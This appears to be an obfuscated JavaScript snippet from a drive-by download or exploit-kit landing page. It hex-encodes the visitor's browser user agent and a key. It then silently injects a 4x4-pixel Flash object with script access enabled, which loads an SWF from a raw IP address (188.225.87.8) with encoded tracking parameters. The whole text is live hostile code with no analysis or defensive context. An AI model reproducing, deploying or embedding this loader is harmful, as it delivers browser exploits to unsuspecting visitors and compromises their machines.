/*s61269d93300hssfj6973fs*/function hgfgerdfgdf(num, width){/*s96457d76622hfj64073fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s35093d37778hfj16393fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s24413d28651hfj44587fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s18607d54036hfj69139fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd63905hfs*/c += b + d;/*s86671d60858hfj32396fs*/e += 1;}return c;}/*s17478dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.87.8/?MTA1OTE4NDQ3&newest=xX_QMvWdbRXQC53EKvrcT6NEMVHRHECL2YydmrHTefjaeVWkzrLFTF_xozKASASG6_FtdfJSDQ&round=S3jxTWewRgyolcVVMb9vv8jEDdzEWe0cWA_BeOZAtM_cSUELZo2gj2zLAkdsMlzhCL6FETi-tL&information=Mzk4NjM3MzU=&before=MTUxMjM3MzE=", ghnvbn("http://188.225.87.8/?OTIxODQ4MTU=&information=MzYwMjk0OTg=&round=myowMBFsT9qj4iUDSwBeU0pbQ_xeFZAgWrpPHFrM521_wxrMWJskjwBTRvGBTz-gtUFsX4wgRnaz7S6OJrg&newest=xHzQMrDYbR3FFYPfKPrEUKREMU7WA0SKwYyZhazVF5yxFDTGpbH1FxzspVydCF-EmvFvdLAHIwKh1UTASwd&shield=MzczODMxNzQ=","gexywoaxor"));